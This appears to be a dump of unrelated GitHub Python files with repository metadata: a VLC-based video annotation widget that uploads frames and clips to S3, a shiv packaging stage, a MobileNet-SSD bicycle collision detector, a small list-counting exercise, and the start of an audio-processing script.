QLineEdit and QApplication.activeModalWidget() is None:\n if evt.key() == Qt.Key_Space:\n self.toggle_play()\n return True\n\n return False\n\n def load(self, file_name):\n self._file_name = file_name\n\n self.clear_extent()\n\n\n getLogger('finprint').info(\"Loading loading video {0}\".format(self._file_name))\n self.media = self.instance.media_new(self._file_name)\n self.mediaplayer.set_media(self.media)\n self.media.parse()\n\n # Where the magic starts - you have to give the handle of the QFrame (or similar object) to\n # vlc, different platforms have different functions for this. Downside is its opaque to you,\n # libvlc is doing the rendering, so you are limited in what you can do with the widget - it\n # is an event black hole in Windows platforms\n if sys.platform.startswith('linux'): # for Linux using the X Server\n self.mediaplayer.set_xwindow(self.videoframe.winId())\n elif sys.platform == \"win32\": # for Windows\n self.mediaplayer.set_hwnd(self.videoframe.winId())\n elif sys.platform == \"darwin\": # for MacOS\n self.mediaplayer.set_nsobject(self.videoframe.winId())\n\n # don't start listening for spacebar until video is loaded and playable\n QCoreApplication.instance().installEventFilter(self)\n\n self._play_state = PlayState.Paused\n\n # wire up callbacks to VLC for snapshots and end of stream,\n # which is relative to the media being played\n mp_event_mgr = self.mediaplayer.event_manager()\n mp_event_mgr.event_attach(EventType.MediaPlayerSnapshotTaken, self.snapShotTaken)\n # XXX Uncomment these for debugging\n # mp_event_mgr.event_attach(EventType.MediaPlayerEndReached, self.streamEndEvent)\n # mp_event_mgr.event_attach(EventType.MediaPlayerPositionChanged, self.positionChangedEvent)\n # mp_event_mgr.event_attach(EventType.MediaPlayerTimeChanged, self.timeChangedEvent)\n\n # don't start listening for spacebar until video is loaded and playable\n self.mediaplayer.video_set_mouse_input(True)\n\n # if we have any special options, like hardware acceleration, that are media specific, set them here\n # XXX sohrt term hack here, we're only going to load these options if it is fullscreen\n opts = get_vlc_media_options()\n if opts and self._fullscreen :\n self.media.add_options(opts)\n\n self.show()\n # XXX hack to display the first few frames, which alters the bahavior of\n # VLC with respect to video scrubbing\n self.mediaplayer.set_time(20)\n print(\" playing for 20 msec\")\n self.mediaplayer.play()\n QTimer.singleShot(500, self.after_load)\n\n return True\n\n def after_load(self):\n self.mediaplayer.pause()\n self.clear_extent()\n self.annotationImage.clear()\n self.take_videoframe_snapshot()\n\n def _target_width(self):\n try:\n if not self._fullscreen:\n return VIDEO_WIDTH\n elif self.geometry().width() / self.geometry().height() > self._aspect_ratio:\n return self._target_height() * self._aspect_ratio\n else:\n return self.geometry().width()\n except ZeroDivisionError:\n return 0\n\n def _target_height(self):\n try:\n if not self._fullscreen:\n return self._target_width() / self._aspect_ratio\n elif self.geometry().width() / self.geometry().height() < self._aspect_ratio:\n return self._target_width() / self._aspect_ratio\n else:\n return self.geometry().height()\n except ZeroDivisionError:\n return 0\n\n # Reinstate last_progress here\n def on_timer(self):\n if self._play_state is not PlayState.EndOfStream:\n pos = self.mediaplayer.get_time()\n #intializing/updating timeVO to use as a common timer holder\n self.timer_vo.timer_duration_ms = pos\n if pos > (self.media.get_duration() - 2000):\n self.streamEndEvent()\n if self._play_state is PlayState.Playing and self._last_progress > PROGRESS_UPDATE_INTERVAL:\n self._last_progress = pos\n self.progressUpdate.emit(pos)\n self._onPositionChange(pos)\n\n def clear(self):\n print('vlc_video_widget > clear: get_position {0}'.format(self.get_position()))\n #self.pause()\n # TODO: clear/reset vlc media player\n self.mediaplayer.stop()\n self._timer.cancel()\n self.annotationImage.clear()\n self.removeWidget(self.annotationImage)\n self.annotationImage.hide()\n self.annotationImage = None\n self.annotationImage = AnnotationImage()\n self.addWidget(self.annotationImage)\n # set videoframe as default visibile widget\n self.setCurrentIndex(VIDEOFRAME_INDEX)\n self.hide()\n self.update()\n\n\n def get_highlight_extent(self):\n ext = Extent()\n # The video may may have some padding in some cases when in fullscreen mode,\n # so use the _target_width() and _target_height() to determine the actual video size,\n # and offset the extent relative to any padding that may be there\n if self._fullscreen:\n # expected size of video\n actual_width = self._target_width()\n x_offset = (self.annotationImage.width() - actual_width)/2\n actual_height = self._target_height()\n y_offset = (self.annotationImage.height() - actual_height)/2\n annotation_rect = self.annotationImage.get_rect()\n annotation_rect.moveTo(annotation_rect.x() - x_offset, annotation_rect.y() - y_offset )\n ext.setRect(annotation_rect, actual_height, actual_width)\n else:\n ext.setRect(self.annotationImage.get_rect(), self.videoframe.height(), self.videoframe.width())\n return ext\n\n def get_highlight_as_list(self):\n r = self._highlighter.get_rect()\n return list(r.getCoords())\n\n def display_event(self, pos, extent):\n self.pause()\n self.annotationImage.clear()\n if self._fullscreen:\n # The video may may have some padding in some cases when in fullscreen mode,\n # so use the _target_width() and _target_height() to determine the actual video size,\n # and request an extent for that size. Once we have an extent, offset it to\n # account for any padding that may be there\n actual_width = self._target_width()\n x_offset = (self.annotationImage.width() - actual_width) / 2\n actual_height = self._target_height()\n y_offset = (self.annotationImage.height() - actual_height) / 2\n rect = extent.getRect(actual_height, actual_width)\n rect.moveTo(rect.x() + x_offset, rect.y() + y_offset)\n else:\n rect = extent.getRect(self.videoframe.height(), self.videoframe.width())\n self._observation_rect = rect\n self.scrub_position(pos)\n QTimer.singleShot(1000, self.display_observation_snaphot)\n\n def take_videoframe_snapshot(self):\n getLogger('finprint').info('take videoframe snapshot')\n self.annotationImage.clear()\n self.annotationImage.show()\n pix = QPixmap.grabWindow(self.videoframe.winId())\n snap = pix.scaledToHeight(self.videoframe.height())\n self.annotationImage.curr_image = snap.toImage()\n self.current_snapshot = snap.toImage()\n # XXX inline this function\n if self.is_filtered():\n self.refresh_frame()\n self.setCurrentIndex(ANNOTATION_INDEX)\n\n def display_observation_snaphot(self):\n self.take_videoframe_snapshot()\n if self._observation_rect is not None:\n getLogger('finprint').info('draw observation rect at {0}'.format(self._observation_rect))\n self.annotationImage.highlighter.start_rect(self._observation_rect.topLeft())\n self.annotationImage.highlighter.set_rect(self._observation_rect.bottomRight())\n self.annotationImage.repaint()\n\n def scrub_position(self, pos):\n # todo - just have a Seek State\n self.set_position(pos)\n print(\"vlc_video_widget > scrub_position \", pos)\n self.pause()\n\n def set_position(self, pos):\n self._onPositionChange(pos)\n p = (pos) / self.media.get_duration()\n getLogger('finprint').info('set_position {0}'.format(p))\n self.setCurrentIndex(VIDEOFRAME_INDEX)\n self.mediaplayer.set_position(p)\n self.timer_vo.timer_duration_ms = pos\n\n\n def toggle_play(self):\n if self._play_state in [PlayState.Paused, PlayState.SeekForward, PlayState.SeekBack]:\n getLogger('finprint').info('toggle_play: play')\n self.play()\n else:\n getLogger('finprint').info('toggle_play: pause')\n self.pause()\n\n def play(self):\n # TODO emit if end of stream via callback\n\n self.show()\n self.clear_extent()\n self.set_speed(1.0)\n playStarted = self.mediaplayer.play()\n print('vlc_video_widget > play: play started? {0}'.format(playStarted))\n self._play_state = PlayState.Playing\n self._timer.start()\n self.playStateChanged.emit(self._play_state)\n\n def pause(self):\n if self.mediaplayer.is_playing():\n paused = self.mediaplayer.pause()\n getLogger('finprint').info('paused')\n self._play_state = PlayState.Paused\n self.playStateChanged.emit(self._play_state)\n self.playbackSpeedChanged.emit(0.0)\n self._timer.cancel()\n self.take_videoframe_snapshot()\n else :\n QTimer.singleShot(500, self.take_videoframe_snapshot)\n\n def save_image(self, filename):\n self.curr_s3_upload = filename\n curr_snapshot = os.path.basename(filename)\n snapshot_path_bytes = os.path.join(self.temp_snapshot_dir, curr_snapshot).encode('utf-8')\n # vlc calls need a C style string\n snapshot_path = ctypes.create_string_buffer(snapshot_path_bytes)\n # request actual decoded frame size from libvlc\n self.mediaplayer.video_take_snapshot(0, snapshot_path, 0, 0)\n\n def upload_image(self, filename, curr_image):\n getLogger('finprint').info('Uploading {0}'.format(filename))\n data = QByteArray()\n buffer = QBuffer(data)\n curr_image.save(buffer, 'PNG', SCREEN_CAPTURE_QUALITY)\n bio = BytesIO(data.data())\n bio.seek(0)\n try:\n conn = S3Connection(AWS_ACCESS_KEY_ID, AWS_SECRET_ACCESS_KEY)\n bucket = conn.get_bucket(AWS_BUCKET_NAME)\n if not bucket.get_key(filename):\n key = bucket.new_key(filename)\n key.set_contents_from_string(bio.read(), headers={'Content-Type': 'image/png'})\n key.set_acl('public-read')\n else:\n getLogger('finprint').error('File already exists on S3: {0}'.format(filename))\n except S3ResponseError as e:\n getLogger('finprint').error(str(e))\n\n def is_paused(self):\n return self._play_state == PlayState.Paused\n\n ''' Provides duration of current video play in milli seconds '''\n def get_position(self):\n return self.timer_vo.timer_duration_ms\n\n def get_length(self):\n duration = self.media.get_duration()\n if duration == -1:\n getLogger('finprint').exception(\"Failed to calculate length\")\n return 0\n else:\n return duration\n\n def fast_forward(self):\n self.set_speed(2.0)\n\n ## No worky.\n def rewind(self):\n if self._play_state == PlayState.SeekBack:\n self.mediaplayer.pause()\n else:\n self._play_state = PlayState.SeekBack\n self.clear_extent()\n self.playStateChanged.emit(self._play_state)\n\n def context_menu(self):\n if self._context_menu:\n if self._context_menu.display() is None :\n self._highlighter.clear()\n self.annotationImage.clearExtent()\n self.annotationImage.update()\n\n def is_filtered(self):\n return self.saturation > 0 or self.brightness > 0 or self.contrast\n\n def clear_extent(self):\n self.annotationImage.clearExtent()\n\n def set_speed(self, speed, start_playing=True):\n # XXX assume we are about to or are playing, so show videoframe\n self.setCurrentIndex(VIDEOFRAME_INDEX)\n self.mediaplayer.set_rate(speed)\n\n # XXX Hack for set_positon\n if start_playing:\n self.playbackSpeedChanged.emit(speed)\n\n if PlayState.Paused and start_playing:\n self.mediaplayer.play()\n self._play_state = PlayState.Playing\n self.playStateChanged.emit(self._play_state)\n\n def resizeEvent(self, ev):\n self.update()\n\n def refresh_frame(self):\n self._refresh_frame_cv()\n\n def _refresh_frame_cv(self):\n if self._play_state is PlayState.Paused and self.current_snapshot :\n # grab a cv representation of the image\n # that has not been filtered\n curr_img = self.current_snapshot\n bgr = curr_img.rgbSwapped()\n cvFrame = self.qimage_to_numpy(bgr)\n filtered_img = self.filter_image(cvFrame)\n self.annotationImage.curr_image = filtered_img\n self.update()\n\n def filter_image(self, curr_img):\n frame = curr_img\n image = None\n try:\n getLogger('finprint').debug('saturation: {0} brightness: {1}'.format(self.saturation, self.brightness))\n # adjust brightness and saturation\n if (self.saturation > 0 or self.brightness > 0) and self._play_state == PlayState.Paused:\n hsv = cv2.cvtColor(frame, cv2.COLOR_BGR2HSV)\n h, s, v = cv2.split(hsv)\n final_hsv = cv2.merge((\n h,\n np.where(255 - s < self.saturation, 255, s + self.saturation),\n np.where(255 - v < self.brightness, 255, v + self.brightness)\n ))\n frame = cv2.cvtColor(final_hsv, cv2.COLOR_HSV2BGR)\n\n # equalize contrast\n if self.contrast is True and self._play_state == PlayState.Paused:\n lab = cv2.cvtColor(frame, cv2.COLOR_BGR2Lab)\n l_chan = cv2.extractChannel(lab, 0)\n l_chan = cv2.createCLAHE(clipLimit=2.0).apply(l_chan)\n cv2.insertChannel(l_chan, lab, 0)\n frame = cv2.cvtColor(lab, cv2.COLOR_Lab2BGR)\n\n height, width, channels = frame.shape\n image = QImage(frame, width, height, QImage.Format_RGB888)\n\n except Exception as ex:\n getLogger('finprint').exception('Exception building image: {}'.format(str(ex)))\n\n return image\n\n def qimage_to_numpy(self, curr_image):\n # make sure we have the smallest usable size\n curr_image = curr_image.convertToFormat(QImage.Format_RGB888)\n curr_image = curr_image.rgbSwapped()\n width = curr_image.width()\n height = curr_image.height()\n\n ptr = curr_image.bits()\n ptr.setsize(curr_image.byteCount())\n # XXX Make the # of channels (shape[2]) conditional, so if we\n # have an alpha or b/w it can be scaled accordingly\n frame = np.array(ptr).reshape(height, width, 3) # Copies the data\n\n return frame\n\n # callbacks start here\n # XXX TODO - add a video filter to libvlc to detect when video has been clicked,\n # so that it acts like the previous opencv-based version. This is likely a c based\n # video filter (plugin) for libvlc.\n def playerPausedEvent(self, event):\n # XXX remove\n getLogger('finprint').info('player paused event')\n\n # emit an event when at end of video.\n def streamEndEvent(self):\n getLogger('finprint').info('end of stream event')\n self._play_state = PlayState.EndOfStream\n self.playStateChanged.emit(self._play_state)\n dur = self.media.get_duration()\n self.mediaplayer.set_position((dur - 1000) / dur)\n print('vlc_video_widget > streamEndEvent: dur {0}, mediaplayer.get_position {1}'.format(dur, self.mediaplayer.get_position()))\n self.pause()\n self.playStateChanged.emit(self._play_state)\n\n # once a snaphsot is generated by vlc, post the snapshot (a decoded video frame)\n # in a background thread. It seems to be blocking on the main thread, even though\n # we should be running off of a C runtime thread\n def snapShotTaken(self, event):\n getLogger('finprint').info('process snaphot')\n # upload on a separate thread\n upload_thread = threading.Thread(target=self.process_snapshot)\n upload_thread.start()\n\n def process_snapshot(self):\n if self.curr_s3_upload is not None:\n s3_filename = os.path.basename(self.curr_s3_upload)\n getLogger('finprint').info('Searching for {0}'.format(s3_filename))\n expected_file = os.path.join(self.temp_snapshot_dir, s3_filename)\n if os.path.isfile(expected_file):\n getLogger('finprint').info('Found {0}'.format(expected_file))\n upload_img = QImage(expected_file)\n self.upload_image(self.curr_s3_upload, upload_img)\n self.curr_s3_upload = None\n print(\" expected_file \", expected_file)\n print(\" self.curr_s3_upload \", self.curr_s3_upload)\n print(\" s3_filename \", s3_filename)\n os.remove(expected_file)\n\n # callback for 'MediaPlayerPositionChanged'\n def positionChangedEvent(self, event):\n pos = self.mediaplayer.get_position()\n getLogger('finprint').info('Position changed: {0}'.format(pos))\n\n # callback for 'MediaPlayerTimeChanged'\n def timeChangedEvent(self, event):\n pos = self.mediaplayer.get_time()\n getLogger('finprint').info('Time changed: {0}'.format(pos))\n\n\n def generate_8sec_clip(self, filename) :\n if os.path.exists(self._file_name) :\n clip_path = self.generate_8sec_video_clip_wid_ffpmpeg(filename)\n else :\n getLogger('finprint').info('file path doesnt exist'.format(self._file_name))\n\n if filename is not None:\n s3_filename = os.path.basename(filename)\n getLogger('finprint').info('Searching for {0}'.format(s3_filename))\n expected_file = os.path.join(self.temp_snapshot_dir, s3_filename)\n if os.path.isfile(expected_file):\n getLogger('finprint').info('Found {0}'.format(expected_file))\n self.upload_8sec_clip(filename, clip_path)\n os.remove(clip_path)\n\n\n def upload_8sec_clip(self, filename, clip_path):\n getLogger('finprint').info('Uploading {0}'.format(filename))\n try:\n conn = S3Connection(AWS_ACCESS_KEY_ID, AWS_SECRET_ACCESS_KEY)\n bucket = conn.get_bucket(AWS_BUCKET_NAME)\n if not bucket.get_key(filename):\n key = bucket.new_key(filename)\n key.set_contents_from_filename(clip_path, headers={'Content-Type': 'video/mp4'})\n key.set_acl('public-read')\n print('File successfully uploaded on S3: {0}'.format(filename))\n getLogger('finprint').info('File successfully uploaded on S3: {0}'.format(filename))\n else:\n getLogger('finprint').error('File already exists on S3: {0}'.format(filename))\n except S3ResponseError as e:\n self.retry_count += 1\n getLogger('finprint').error(str(e))\n getLogger('finprint').error(\"Will retry in 20 sec......\")\n if self.retry_count == 1:\n time.sleep(10)\n print('***** retrying AWS upload again *****')\n self.upload_8sec_clip( filename, clip_path)\n else :\n getLogger('finprint').error(\"retry not working....\")\n msg = 'There was an error saving the video clip to the server. Retry by editing the observation or continue without creating a video clip.'\n QMessageBox.question(self.parent(), 'AWS UPLOAD ERROR', msg, QMessageBox.Close)\n except Exception as e:\n getLogger('finprint').error(str(e))\n self.retry_count += 1\n time.sleep(10)\n if self.retry_count == 1:\n print('***** retrying AWS upload again *****')\n self.upload_8sec_clip(filename, clip_path)\n else:\n getLogger('finprint').error(\"retry not working....\")\n msg = 'There was an error saving the video clip to the server. Retry by editing the observation or continue without creating a video clip.'\n QMessageBox.question(self.parent(), 'AWS UPLOAD ERROR', msg, QMessageBox.Close)\n\n self.retry_count = 0\n\n def generate_8sec_video_clip_wid_ffpmpeg(self, filename):\n try:\n curr_snapshot = os.path.basename(filename)\n clip_path = os.path.join(self.temp_snapshot_dir, curr_snapshot)\n if os.path.exists(clip_path):\n getLogger('finprint').info('removing duplicates video name from local disk {0}'.format(clip_path))\n try:\n os.remove(clip_path)\n except Exception :\n getLogger('finprint').info('not able to delete video name {0} from local disk '.format(clip_path))\n # vlc calls need a C style string\n t_start = self.get_position() / 1000\n if self.get_position() + 8000 > self.get_length():\n t_end = (self.get_length() - self.get_position()) / 1000\n else:\n t_end = 8\n ffmpeg_exe_path = \"ffmpeg_executable/ffmpeg.exe\"\n getLogger('finprint').info('ffpmge_exe_path {0}'.format(ffmpeg_exe_path))\n print(ffmpeg_exe_path)\n execute_command = ffmpeg_exe_path+' -i '+self._file_name+ ' -vf scale=800:-1 -c:v libx264 -ss '+ str(t_start) +' -c:a copy -t '+ \\\n str(t_end) +' -an '+clip_path\n subprocess.call(execute_command)\n except subprocess.CalledProcessError as e:\n self.retry_count += 1\n time.sleep(5)\n getLogger('finprint').error('subprocess exception in generating video clip {0}'.format(e))\n if self.retry_count == 1:\n print('***** retrying again *****')\n return self.generate_8sec_video_clip_wid_ffpmpeg(filename)\n else :\n msg = 'An error occurred while creating the video clip. Check your network connection and re-try by editing the observation or continue without creating a video.'\n QMessageBox.question(self.parent(), '8Sec Video Clip Error', msg, QMessageBox.Close)\n except Exception as e :\n self.retry_count += 1\n getLogger('finprint').error(' error in generating video clip {0}'.format(e))\n\n if self.retry_count == 1 :\n time.sleep(5)\n print('***** retrying again *****')\n return self.generate_8sec_video_clip_wid_ffpmpeg(filename)\n else :\n msg = 'An error occurred while creating the video clip. Check your network connection and re-try by editing the observation or continue without creating a video.'\n QMessageBox.question(self.parent(), '8Sec Video Clip Error', msg, QMessageBox.Close)\n\n self.retry_count = 0\n return clip_path","repo_name":"GlobalFinPrint/Finprint-Annotator","sub_path":"video_player/vlc_video_widget.py","file_name":"vlc_video_widget.py","file_ext":"py","file_size_in_byte":32462,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"16"} +{"seq_id":"74033364169","text":"import os\nimport os.path\nimport sys\nimport subprocess\n\nfrom typing import BinaryIO\nfrom subprocess import (\n check_output,\n CalledProcessError,\n)\nfrom tempfile import TemporaryDirectory\nfrom itertools import chain\nfrom contextlib import nullcontext\n\nimport tomli_w\n\nfrom vernac.stages.interface import (\n VernacStage,\n StageContext,\n StageAction,\n StageOutput,\n)\n\ndef generate_pyproject(file: BinaryIO, deps: list[str]):\n data = {\n \"build-system\": {\n \"requires\": [\"setuptools\", \"setuptools-scm\"],\n \"build-backend\": \"setuptools.build_meta\"\n },\n \"project\": {\n \"name\": \"vnprog\",\n \"requires-python\": \">=3.10\",\n \"dependencies\": deps,\n \"version\": \"0.0.1\",\n \"scripts\": {\n \"main\": \"vnprog.main:main\"\n },\n },\n }\n\n tomli_w.dump(data, file)\n\ndef package_in_dir(py_files: dict[str, str], dir_path: str, deps: list[str]):\n def to_dir(*rel_paths: str) -> str:\n return os.path.join(dir_path, *rel_paths)\n\n os.makedirs(to_dir(\"src/vnprog\"), exist_ok=True)\n\n for (filename, python) in py_files.items():\n py_path = to_dir(\"src/vnprog\", filename)\n\n with open(py_path, \"wt\") as file:\n file.write(python)\n\n with open(to_dir(\"pyproject.toml\"), \"wb\") as file:\n generate_pyproject(file, deps)\n\ndef shiv_package(dir_path: str, out_path: str):\n # crudely guess the shiv bin location\n python_dir = os.path.dirname(sys.executable)\n shiv_path = os.path.join(python_dir, \"shiv\")\n\n # run shiv to package\n try:\n check_output(\n [\n shiv_path,\n \"-o\", out_path,\n \"-c\", \"main\",\n dir_path,\n ],\n stderr=subprocess.STDOUT,\n )\n except CalledProcessError as error:\n print(error.output)\n\n raise\n\nclass PackageStage(VernacStage):\n steps = 2\n\n def __init__(\n self,\n title: str,\n out_path: str,\n package_dir: str | None = None,\n ):\n self.title = title\n self.out_path = out_path\n self.package_dir = package_dir\n\n def run(\n self,\n context: StageContext,\n python: str,\n dependencies: list[str],\n modules: dict[str, dict],\n ) -> StageOutput:\n py_files = {\"main.py\": python}\n\n for module in modules.values():\n py_files[module[\"py_name\"]] = module[\"python\"]\n\n module_deps = chain.from_iterable(\n m[\"dependencies\"] for m in modules.values()\n )\n\n if self.package_dir is None:\n tmpdir_context = TemporaryDirectory(prefix=\"vernac-\")\n else:\n tmpdir_context = nullcontext(\n os.path.abspath(self.package_dir),\n )\n\n with tmpdir_context as tmpdir:\n package_in_dir(\n py_files=py_files,\n dir_path=tmpdir,\n deps=dependencies + list(module_deps),\n )\n\n context.advance_progress()\n\n shiv_package(dir_path=tmpdir, out_path=self.out_path)\n\n context.advance_progress()\n\n return StageOutput(\n action=StageAction.NEXT,\n state=dict(out_path=self.out_path),\n )\n","repo_name":"bsilverthorn/vernac","sub_path":"src/vernac/stages/package.py","file_name":"package.py","file_ext":"py","file_size_in_byte":3329,"program_lang":"python","lang":"en","doc_type":"code","stars":6,"dataset":"github-code","pt":"16"} +{"seq_id":"16994403188","text":"from imutils.video import VideoStream\nfrom imutils.video import FPS\nimport numpy as np\nimport argparse\nimport imutils\nimport time\nimport cv2\n\n\n# example run args\n# -p model/model_deploy.prototxt.txt -m model/model_deploy.caffemodel -w 600 -d True\n\nIDX_CONFIG_ALL = [2,6,7,14,15]\nIDX_CONFIG_VEHICLES = [2,6,7,14]\n\n# construct the argument parse and parse the arguments\nap = argparse.ArgumentParser()\nap.add_argument(\"-p\", \"--prototxt\", required=True,\n help=\"path to Caffe 'deploy' prototxt file\")\nap.add_argument(\"-m\", \"--model\", required=True,\n help=\"path to Caffe pre-trained model\")\nap.add_argument(\"-c\", \"--confidence\", type=float, default=0.2,\n help=\"minimum probability to filter out unreliable detections\")\nap.add_argument(\"-w\", \"--width\", type=int, default=600,\n help=\"max width of screen to grab\")\nap.add_argument(\"-d\", \"--debug\", type=bool, default=False,\n help=\"show the screen being grabbed, imshow\")\nap.add_argument(\"-i\", \"--idxconfig\", type=str, default='IDX_CONFIG_ALL',\n help=\"choose the IDX_CONFIG to use IDX_CONFIG_ALL for vehicles + person or IDX_CONFIG_VEHICLES for only vehicles\")\n\nargs = vars(ap.parse_args())\n\nif args[\"idxconfig\"] == 'IDX_CONFIG_ALL':\n IDX_CONFIG = IDX_CONFIG_ALL\nelse:\n IDX_CONFIG = IDX_CONFIG_VEHICLES\n\nNUM_DIODES = 8\n\n# initialize the list of class labels MobileNet SSD was trained on\nCLASSES = [\"background\", \"aeroplane\", \"bicycle\", \"bird\", \"boat\",\n \"bottle\", \"bus\", \"car\", \"cat\", \"chair\", \"cow\", \"diningtable\",\n \"dog\", \"horse\", \"motorbike\", \"person\", \"pottedplant\", \"sheep\",\n \"sofa\", \"train\", \"tvmonitor\"]\n\n# opencv color space BGR - bounding box colors for debugging\nCOLORS = {2: (255,255,0), # bicycle - lightblue\n 6: (0,128,255), # orange - bus\n 7: (0,0,255), # red - car\n 14: (0,255,255), # yellow - motorbike\n 15: (0,255,0) # green' - person\n }\n\n\n\n# idx = class_label\n # 2 = bicycle\n # 6 = bus\n # 7 = car\n # 14 = motorbike\n # 15 = person\n\n\n# load model from file\nprint(\"loading model...\")\nnet = cv2.dnn.readNetFromCaffe(args[\"prototxt\"], args[\"model\"])\n\n\ndef vid_stream():\n # start video\n print(\"starting video...\")\n stream = VideoStream(src=0).start()\n # give time to grab a frame\n time.sleep(2.0)\n fps = FPS().start()\n while (True):\n # max width of 600 pixel for video in\n f = stream.read()\n f = imutils.resize(f, width=args[\"width\"])\n\n (h, w) = f.shape[:2]\n blob = cv2.dnn.blobFromImage(cv2.resize(f, (300, 300)),\n 0.007843, (300, 300), 127.5)\n\n # pass blob to nn\n net.setInput(blob)\n detections = net.forward()\n\n # loop over the detections\n for i in np.arange(0, detections.shape[2]):\n # extract the confidence (probability) of nn:s prediction\n confidence = detections[0, 0, i, 2]\n\n # filter out weak detections (unlikely)\n if confidence > args[\"confidence\"]:\n # extract the index of the class label\n # (x, y)-coordinates of the bounding box for the object\n idx = int(detections[0, 0, i, 1])\n box = detections[0, 0, i, 3:7] * np.array([w, h, w, h])\n (startX, startY, endX, endY) = box.astype(\"int\")\n\n # draw_prediction(confidence, endX, endY, f, idx, startX, startY)\n\n # how wide is classified object\n obj_width = endX - startX\n obj_height = endY - startY\n\n #if classified object is interesting\n # if idx == 2 or idx == 6 or idx == 7 or idx == 14 or idx==15:\n if idx in IDX_CONFIG:\n # draw the prediction on the streams cur_frame\n draw_prediction(confidence, endX, endY, f, idx, startX, startY)\n\n if obj_width >= 1/4 * w:\n activate_diodes(startX, endX, w, idx)\n draw_warning(f)\n\n # show the output frame\n if args[\"debug\"]:\n cv2.imshow(\"Output Frame\", f)\n key = cv2.waitKey(1) & 0xFF\n\n # if the `q` key was pressed, break from the loop\n if key == ord(\"q\"):\n break\n\n # update the FPS counter\n fps.update()\n fps.stop()\n # print(\"[INFO] approx. FPS: {:.2f}\".format(fps.fps()))\n\n # do a bit of cleanup\n cv2.destroyAllWindows()\n stream.stop()\n\n\ndef draw_warning(f):\n # draws warning on cv screen\n cv2.putText(f, 'WARNING!!!', (50, 50), cv2.FONT_HERSHEY_SIMPLEX, 1.0, (0, 0, 255), 3)\n\n\ndef draw_prediction(confidence, endX, endY, f, idx, startX, startY):\n # draw the prediction on the streams cur_frame\n label = \"{}: {:.2f}%\".format(CLASSES[idx],\n confidence * 100)\n cv2.rectangle(f, (startX, startY), (endX, endY),\n COLORS[idx], 2)\n y = startY - 15 if startY - 15 > 15 else startY + 15\n cv2.putText(f, label, (startX, y),\n cv2.FONT_HERSHEY_SIMPLEX, 0.5, COLORS[idx], 2)\n\n\ndef get_color_for_class(idx):\n # Define colors which will be used by the example. Each color is an unsigned\n # 32-bit value where the lower 24 bits define the red, green, blue data (each\n # being 8 bits long).\n # DOT_COLORS = [0x200000, # red\n # 0x201000, # orange\n # 0x202000, # yellow\n # 0x002000, # green\n # 0x002020, # lightblue #\n # 0x000020, # blue\n # 0x100010, # purple\n # 0x200010] # pink\n\n # 2 = bicycle\n # 6 = bus\n # 7 = car\n # 14 = motorbike\n # 15 = person\n color_id_dict = {2: '0x002020', #bicycle - lightblue\n 6: '0x201000', #orange - bus\n 7: '0x200000', #red - car\n 14:'0x202000', #yellow - motorbike\n 15: '0x002000' # green' - person\n }\n\n return color_id_dict[idx]\n\n\ndef activate_diodes(startX, endX, w, idx):\n # pass 22 tuples,\n # (id, color(32 byte rgb))\n\n\n\n # Brightness 0-255\n brightness = 255\n\n width_per_diode = w/NUM_DIODES\n start_id = startX/width_per_diode\n end_id = endX/width_per_diode\n # get the diodes as tuples (i, value on/off)\n diode_ls = []\n # color = get_color_for_class(idx)\n # off_color = '0x000000' #black\n\n for i in range(1,NUM_DIODES + 1):\n # which diodes to activate\n if(i> start_id and i < end_id):\n diode_active = True\n else:\n diode_active = False\n diode_ls.append(diode_active)\n # print(diode_ls)\n\n #TODO send tuple_ls to diode\n\n\n\ndef img_classify(img):\n while (True):\n # max width of 400 pixel for video stream\n f = cv2.imread(img)\n f = imutils.resize(f, width=400)\n\n (h, w) = f.shape[:2]\n blob = cv2.dnn.blobFromImage(cv2.resize(f, (300, 300)),\n 0.007843, (300, 300), 127.5)\n\n # pass blob to nn\n net.setInput(blob)\n detections = net.forward()\n\n # loop over the detections\n for i in np.arange(0, detections.shape[2]):\n # extract the confidence (probability) of nn:s prediction\n confidence = detections[0, 0, i, 2]\n\n # filter out weak detections (unlikely)\n if confidence > args[\"confidence\"]:\n # extract the index of the class label\n # (x, y)-coordinates of the bounding box for the object\n idx = int(detections[0, 0, i, 1])\n box = detections[0, 0, i, 3:7] * np.array([w, h, w, h])\n (startX, startY, endX, endY) = box.astype(\"int\")\n\n # draw_prediction(confidence, endX, endY, f, idx, startX, startY)\n\n # how wide is classified object\n obj_width = endX - startX\n obj_height = endY - startY\n\n # if classified object is interesting\n # if idx == 2 or idx == 6 or idx == 7 or idx == 14 or idx==15:\n if idx in IDX_CONFIG:\n # draw the prediction on the streams cur_frame\n draw_prediction(confidence, endX, endY, f, idx, startX, startY)\n # activate_diodes(startX, endX, w, idx)\n\n if obj_width >= 1 / 4 * w:\n activate_diodes(startX, endX, w, idx)\n draw_warning(f)\n\n # show the output frame\n cv2.imshow(\"Output Frame\", f)\n key = cv2.waitKey(1) & 0xFF\n\n # if the `q` key was pressed, break from the loop\n if key == ord(\"q\"):\n break\n\n cv2.destroyAllWindows()\n\n\n\nvid_stream()\n# img = '/Users/andreas/Documents/HackBike/test_images/test1.jpg'\n# img_classify(img)","repo_name":"efra-mx/cosmo_bike","sub_path":"examples/collision_detector.py","file_name":"collision_detector.py","file_ext":"py","file_size_in_byte":8816,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"16"} +{"seq_id":"3577328788","text":"'''\nCreated on Jan 17, 2012\n\n@author: Meredith\n'''\ndef count(lst, key):\n '''returns how many times value is in list'''\n how_many = 0\n for value in lst:\n if value == key:\n how_many += 1\n return how_many\n \ndef remove_duplicates(lst):\n '''removes the duplicates in a list, returns the list without duplicates'''\n duplicate_lst = []\n for i in lst:\n if not i in duplicate_lst:\n duplicate_lst.append(i)\n duplicate_lst.sort\n return duplicate_lst\n\n\ndef main():\n lst = input('Enter a list: ')\n lst = count(lst)\n print(lst)\n lst = remove_duplicates(lst)\n print(lst)\n \nif __name__ == '__main__':\n main()","repo_name":"zesameri/Beginner-Python-Projects","sub_path":"Basic Concepts/count.py","file_name":"count.py","file_ext":"py","file_size_in_byte":683,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"16"} +{"seq_id":"18156902825","text":"import matplotlib.pyplot as plt\nfrom scipy.io import wavfile\nfrom scipy.signal import stft, decimate\nfrom scipy.signal.windows import hamming\nimport numpy as np\nimport pandas as pd\nimport os\n\n\n# ------------------ Important constants ------------------------ #\n\nMAX_INT_16 = 2 ** 15 - 1 # Maximum integer represented with 8 bits\nSECONDS_PER_MINUTE = 60 # Number of seconds in a minute\n\n# 